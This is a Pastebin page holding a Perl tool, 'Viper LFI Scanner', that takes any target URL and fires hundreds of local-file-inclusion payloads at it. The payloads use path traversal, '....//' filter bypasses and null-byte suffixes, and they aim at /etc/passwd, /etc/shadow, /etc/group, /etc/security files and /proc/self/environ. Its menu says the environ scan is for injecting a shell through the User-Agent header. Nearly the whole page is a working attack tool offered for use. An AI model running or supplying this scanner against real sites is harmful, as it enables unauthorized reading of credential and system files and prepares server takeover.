API tools faq
paste
Advertisement
parkdream1

scanlfi.pl

parkdream1
Mar 31st, 2012
251
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 11.76 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/perl
  2. #
  3. #               ////////////////////////////////////
  4. #                   Viper LFI Scanner Ver. 4.0
  5. #               ////////////////////////////////////
  6. #
  7. #   Title : Viper Lfi Scanner Ver. 4.0
  8. #   Author: Bl4ck.Viper
  9. #   From : Azarbycan
  10. #   Date : 2011/07/06
  11. #   Category : Scanner
  12. #   Home : www.Skote-vahshat.com
  13. #   Emails : Bl4ck.Viper@Yahoo.com , Bl4ck.Viper@Hotmail.com , Bl4ck.Viper@Gmail.com
  14. #  
  15. #
  16. #   Description :Log , Environ , Passwd File Scanner ,& new method for bypass passwd
  17. #                              
  18. #  
  19. #*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
  20.  
  21.     use HTTP::Request;
  22.     use LWP::UserAgent;
  23. system ("cls");
  24. print "\t\t/////////////////////////////////////////////////\n";    
  25. print "\t\t_________________________________________________\n";
  26. print "\t\t\t Viper LFI Scanner Ver. 3.0\n";
  27. print "\t\t\t Coded By Bl4ck.Viper\n";
  28. print "\t\t\t Made In Azarbycan\n";
  29. print "\t\t\t Version In English\n";
  30. print "\t\t_________________________________________________\n";
  31. print "\n\n";
  32. sleep (1);
  33. print "\t\t\t\t WELCOME\n";
  34. print "\n\n";
  35. menu:;
  36. print "\tMenu:\n";
  37. print "\t ID[1]=>Passwd,Log";
  38. print "\t[Scan Files Of /etc/ Directory]\n";
  39. print "\t ID[2]=>Environ";
  40. print "\t\t[Scan Environ File For Inject Shell By U-Agent]\n";
  41. print"\n";
  42. print "\t\t Select ID For Start Scanner :";
  43. $menu = <>;
  44. if ($menu =~ /1/){
  45.     goto lfi;
  46.     }
  47.     if ($menu =~ /2/){
  48.         goto env;
  49.     }
  50.     else {
  51.         print"\n\n";
  52.         print "\t\tUnknow Command\n";
  53.         goto menu;
  54.     };
  55.  
  56.  
  57. lfi:;
  58.     print "\n\n";
  59.     print "\t\t\tWelcome To /etc/ Section With New Method\n\n";
  60.     print "\t Insert Target (ex: http://www.site.com/index.php?page=)\n";
  61.     print "\t Target :";
  62.     $host=<STDIN>;
  63.     chomp($host);
  64.     if($host !~ /http:\/\//) { $host = "http://$host"; };
  65.  
  66. print "\n\n";
  67. print "\t\t*-*-*-*-*-* WORKING IN PROGRESS *-*-*-*-*-*\n";
  68. print "\n\n";
  69. @lfi = ('../etc/passwd',
  70. '../../etc/passwd',
  71. '../../../etc/passwd',
  72. '../../../../etc/passwd',
  73. '../../../../../etc/passwd',
  74. '../../../../../../etc/passwd',
  75. '../../../../../../../etc/passwd',
  76. '../../../../../../../../etc/passwd',
  77. '../../../../../../../../../etc/passwd',
  78. '../../../../../../../../../../etc/passwd',
  79. '../../../../../../../../../../../etc/passwd',
  80. '../../../../../../../../../../../../etc/passwd',
  81. '../../../../../../../../../../../../../etc/passwd',
  82. '../../../../../../../../../../../../../../etc/passwd',
  83. '../../../../../../../../../../../../../../../../etc/passwd',
  84. '....//etc/passwd',
  85. '....//....//etc/passwd',
  86. '....//....//....//etc/passwd',
  87. '....//....//....//....//etc/passwd',
  88. '....//....//....//....//....//etc/passwd',
  89. '....//....//....//....//....//....//etc/passwd',
  90. '....//....//....//....//....//....//....//etc/passwd',
  91. '....//....//....//....//....//....//....//....//etc/passwd',
  92. '....//....//....//....//....//....//....//....//....//etc/passwd',
  93. '....//....//....//....//....//....//....//....//....//....//etc/passwd',
  94. '../../etc/passwd%00',
  95. '../../../etc/passwd%00',
  96. '../../../../etc/passwd%00',
  97. '../../../../../etc/passwd%00',
  98. '../../../../../../etc/passwd%00',
  99. '../../../../../../../etc/passwd%00',
  100. '../../../../../../../../etc/passwd%00',
  101. '../../../../../../../../../etc/passwd%00',
  102. '../../../../../../../../../../etc/passwd%00',
  103. '../../../../../../../../../../../etc/passwd%00',
  104. '../../../../../../../../../../../../etc/passwd%00',
  105. '../../../../../../../../../../../../../etc/passwd%00',
  106. '../../../../../../../../../../../../../../etc/passwd%00',
  107. '../../../../../../../../../../../../../../../../etc/passwd%00',
  108. '....//etc/passwd%00',
  109. '....//....//etc/passwd%00',
  110. '....//....//....//etc/passwd%00',
  111. '....//....//....//....//etc/passwd%00',
  112. '....//....//....//....//....//etc/passwd%00',
  113. '....//....//....//....//....//....//etc/passwd%00',
  114. '....//....//....//....//....//....//....//etc/passwd%00',
  115. '....//....//....//....//....//....//....//....//etc/passwd%00',
  116. '....//....//....//....//....//....//....//....//....//etc/passwd%00',
  117. '....//....//....//....//....//....//....//....//....//....//etc/passwd%00',
  118. '../etc/shadow',
  119. '../../etc/shadow',
  120. '../../../etc/shadow',
  121. '../../../../etc/shadow',
  122. '../../../../../etc/shadow',
  123. '../../../../../../etc/shadow',
  124. '../../../../../../../etc/shadow',
  125. '../../../../../../../../etc/shadow',
  126. '../../../../../../../../../etc/shadow',
  127. '../../../../../../../../../../etc/shadow',
  128. '../../../../../../../../../../../etc/shadow',
  129. '../../../../../../../../../../../../etc/shadow',
  130. '../../../../../../../../../../../../../etc/shadow',
  131. '../../../../../../../../../../../../../../etc/shadow',
  132. '../etc/shadow%00',
  133. '../../etc/shadow%00',
  134. '../../../etc/shadow%00',
  135. '../../../../etc/shadow%00',
  136. '../../../../../etc/shadow%00',
  137. '../../../../../../etc/shadow%00',
  138. '../../../../../../../etc/shadow%00',
  139. '../../../../../../../../etc/shadow%00',
  140. '../../../../../../../../../etc/shadow%00',
  141. '../../../../../../../../../../etc/shadow%00',
  142. '../../../../../../../../../../../etc/shadow%00',
  143. '../../../../../../../../../../../../etc/shadow%00',
  144. '../../../../../../../../../../../../../etc/shadow%00',
  145. '../../../../../../../../../../../../../../etc/shadow%00',
  146. '../etc/group',
  147. '../../etc/group',
  148. '../../../etc/group',
  149. '../../../../etc/group',
  150. '../../../../../etc/group',
  151. '../../../../../../etc/group',
  152. '../../../../../../../etc/group',
  153. '../../../../../../../../etc/group',
  154. '../../../../../../../../../etc/group',
  155. '../../../../../../../../../../etc/group',
  156. '../../../../../../../../../../../etc/group',
  157. '../../../../../../../../../../../../etc/group',
  158. '../../../../../../../../../../../../../etc/group',
  159. '../../../../../../../../../../../../../../etc/group',
  160. '../etc/group%00',
  161. '../../etc/group%00',
  162. '../../../etc/group%00',
  163. '../../../../etc/group%00',
  164. '../../../../../etc/group%00',
  165. '../../../../../../etc/group%00',
  166. '../../../../../../../etc/group%00',
  167. '../../../../../../../../etc/group%00',
  168. '../../../../../../../../../etc/group%00',
  169. '../../../../../../../../../../etc/group%00',
  170. '../../../../../../../../../../../etc/group%00',
  171. '../../../../../../../../../../../../etc/group%00',
  172. '../../../../../../../../../../../../../etc/group%00',
  173. '../../../../../../../../../../../../../../etc/group%00',
  174. '../etc/security/group',
  175. '../../etc/security/group',
  176. '../../../etc/security/group',
  177. '../../../../etc/security/group',
  178. '../../../../../etc/security/group',
  179. '../../../../../../etc/security/group',
  180. '../../../../../../../etc/security/group',
  181. '../../../../../../../../etc/security/group',
  182. '../../../../../../../../../etc/security/group',
  183. '../../../../../../../../../../etc/security/group',
  184. '../../../../../../../../../../../etc/security/group',
  185. '../etc/security/group%00',
  186. '../../etc/security/group%00',
  187. '../../../etc/security/group%00',
  188. '../../../../etc/security/group%00',
  189. '../../../../../etc/security/group%00',
  190. '../../../../../../etc/security/group%00',
  191. '../../../../../../../etc/security/group%00',
  192. '../../../../../../../../etc/security/group%00',
  193. '../../../../../../../../../etc/security/group%00',
  194. '../../../../../../../../../../etc/security/group%00',
  195. '../../../../../../../../../../../etc/security/group%00',
  196. '../etc/security/passwd',
  197. '../../etc/security/passwd',
  198. '../../../etc/security/passwd',
  199. '../../../../etc/security/passwd',
  200. '../../../../../etc/security/passwd',
  201. '../../../../../../etc/security/passwd',
  202. '../../../../../../../etc/security/passwd',
  203. '../../../../../../../../etc/security/passwd',
  204. '../../../../../../../../../etc/security/passwd',
  205. '../../../../../../../../../../etc/security/passwd',
  206. '../../../../../../../../../../../etc/security/passwd',
  207. '../../../../../../../../../../../../etc/security/passwd',
  208. '../../../../../../../../../../../../../etc/security/passwd',
  209. '../../../../../../../../../../../../../../etc/security/passwd',
  210. '../etc/security/passwd%00',
  211. '../../etc/security/passwd%00',
  212. '../../../etc/security/passwd%00',
  213. '../../../../etc/security/passwd%00',
  214. '../../../../../etc/security/passwd%00',
  215. '../../../../../../etc/security/passwd%00',
  216. '../../../../../../../etc/security/passwd%00',
  217. '../../../../../../../../etc/security/passwd%00',
  218. '../../../../../../../../../etc/security/passwd%00',
  219. '../../../../../../../../../../etc/security/passwd%00',
  220. '../../../../../../../../../../../etc/security/passwd%00',
  221. '../../../../../../../../../../../../etc/security/passwd%00',
  222. '../../../../../../../../../../../../../etc/security/passwd%00',
  223. '../../../../../../../../../../../../../../etc/security/passwd%00',
  224. '../etc/security/user',
  225. '../../etc/security/user',
  226. '../../../etc/security/user',
  227. '../../../../etc/security/user',
  228. '../../../../../etc/security/user',
  229. '../../../../../../etc/security/user',
  230. '../../../../../../../etc/security/user',
  231. '../../../../../../../../etc/security/user',
  232. '../../../../../../../../../etc/security/user',
  233. '../../../../../../../../../../etc/security/user',
  234. '../../../../../../../../../../../etc/security/user',
  235. '../../../../../../../../../../../../etc/security/user',
  236. '../../../../../../../../../../../../../etc/security/user',
  237. '../etc/security/user%00',
  238. '../../etc/security/user%00',
  239. '../../../etc/security/user%00',
  240. '../../../../etc/security/user%00',
  241. '../../../../../etc/security/user%00',
  242. '../../../../../../etc/security/user%00',
  243. '../../../../../../../etc/security/user%00',
  244. '../../../../../../../../etc/security/user%00',
  245. '../../../../../../../../../etc/security/user%00',
  246. '../../../../../../../../../../etc/security/user%00',
  247. '../../../../../../../../../../../etc/security/user%00',
  248. '../../../../../../../../../../../../etc/security/user%00',
  249. '../../../../../../../../../../../../../etc/security/user%00');
  250.  
  251.  
  252. foreach $scan(@lfi){
  253.  
  254. $url = $host.$scan;
  255. $request = HTTP::Request->new(GET=>$url);
  256. $useragent = LWP::UserAgent->new();
  257.  
  258. $response = $useragent->request($request);
  259. if ($response->is_success && $response->content =~ /root:x:/) { $msg = Vulnerability;}
  260. else { $msg = "Not Found";}
  261. print "$scan..........[$msg]\n";
  262. }
  263. env:;
  264.     print "\n\n";
  265.     print "\t\t\tWelcom To Environ Section\n\n";
  266.     print "\t Insert Target (ex: http://www.site.com/index.php?page=)\n";
  267.     print "\t Target :";
  268.     $host=<STDIN>;
  269.     chomp($host);
  270.     if($host !~ /http:\/\//) { $host = "http://$host"; };
  271.  
  272. print "\n\n";
  273. print "\t\t*-*-*-*-*-* WORKING IN PROGRESS *-*-*-*-*-*\n";
  274. print "\n\n";
  275.  
  276. @env = ('../proc/self/environ',
  277. '../../proc/self/environ',
  278. '../../../proc/self/environ',
  279. '../../../../proc/self/environ',
  280. '../../../../../proc/self/environ',
  281. '../../../../../../proc/self/environ',
  282. '../../../../../../../proc/self/environ',
  283. '../../../../../../../../proc/self/environ',
  284. '../../../../../../../../../proc/self/environ',
  285. '../../../../../../../../../../proc/self/environ',
  286. '../../../../../../../../../../../proc/self/environ',
  287. '../../../../../../../../../../../../proc/self/environ',
  288. '../../../../../../../../../../../../../proc/self/environ',
  289. '../../../../../../../../../../../../../../proc/self/environ',
  290. '../proc/self/environ%00',
  291. '../../proc/self/environ%00',
  292. '../../../proc/self/environ%00',
  293. '../../../../proc/self/environ%00',
  294. '../../../../../proc/self/environ%00',
  295. '../../../../../../proc/self/environ%00',
  296. '../../../../../../../proc/self/environ%00',
  297. '../../../../../../../../proc/self/environ%00',
  298. '../../../../../../../../../proc/self/environ%00',
  299. '../../../../../../../../../../proc/self/environ%00',
  300. '../../../../../../../../../../../proc/self/environ%00',
  301. '../../../../../../../../../../../../proc/self/environ%00',
  302. '../../../../../../../../../../../../../proc/self/environ%00',
  303. '../../../../../../../../../../../../../../proc/self/environ%00');
  304.  
  305. foreach $scan_env(@env){
  306.  
  307. $url = $host.$scan_env;
  308. $request = HTTP::Request->new(GET=>$url);
  309. $useragent = LWP::UserAgent->new();
  310.  
  311. $response = $useragent->request($request);
  312. if ($response->is_success && $response->content =~ /HTTP_ACCEPT/ && $response->content =~ /HTTP_HOST/) { $msg = Vulnerability;}
  313. else { $msg = "Not Found";}
  314. print "$scan_env..........[$msg]\n";
  315. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!